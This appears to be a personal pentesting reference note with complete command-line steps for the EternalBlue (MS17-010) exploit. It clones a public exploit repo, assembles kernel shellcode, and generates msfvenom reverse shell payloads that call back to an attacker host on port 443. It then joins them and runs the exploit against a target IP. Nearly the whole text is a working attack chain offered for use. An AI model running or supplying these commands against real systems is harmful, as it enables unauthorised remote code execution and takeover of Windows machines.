Backlink: reference-notes-readme

Source Code

Git Source: GitHub - worawit/MS17-010: MS17-010

Initial Preparation

First, clone the git repo.

git clone https://github.com/worawit/MS17-010.git

Next, move into the cloned repo, create a python venv, and install the python2 impacket module.

cd MS17-010
python3 -m venv venv
source venv/bin/activate
python2 -m pip install impacket

The first step to prepare the exploit itself is to assemble the kernel shellcode into binary using nasm. This is done twice, once for each architecture type.

nasm -f bin shellcode/eternalblue_kshellcode_x64.asm -o shellcode/sc_x64_kernel.bin
nasm -f bin shellcode/eternalblue_kshellcode_x86.asm -o shellcode/sc_x86_kernel.bin

Target Specific Preparation

In order to finish preparing the exploit, the following steps must be taken for each target.

First, you need to generate an architecture-specific reverse shell payload with msfvenom.

x64:

msfvenom -p windows/x64/shell_reverse_tcp LPORT=443 LHOST=192.168.49.160 --platform windows -a x64 --format raw -o /var/tmp/sc_x64_payload.bin

x86:

msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=192.168.49.160 --platform windows -a x86 --format raw -o /var/tmp/sc_x86_payload.bin

Then the kernel shellcode and the reverse shell payload need to be concatenated into a single file.

x64:

cat shellcode/sc_x64_kernel.bin /var/tmp/sc_x64_payload.bin > /var/tmp/sc_x64.bin

x86:

cat shellcode/sc_x86_kernel.bin /var/tmp/sc_x86_payload.bin > /var/tmp/sc_x86.bin

Finally, the appropriate exploit file can be executed.

python2 eternalblue_exploit7.py 192.168.160.43 /var/tmp/sc_x86.bin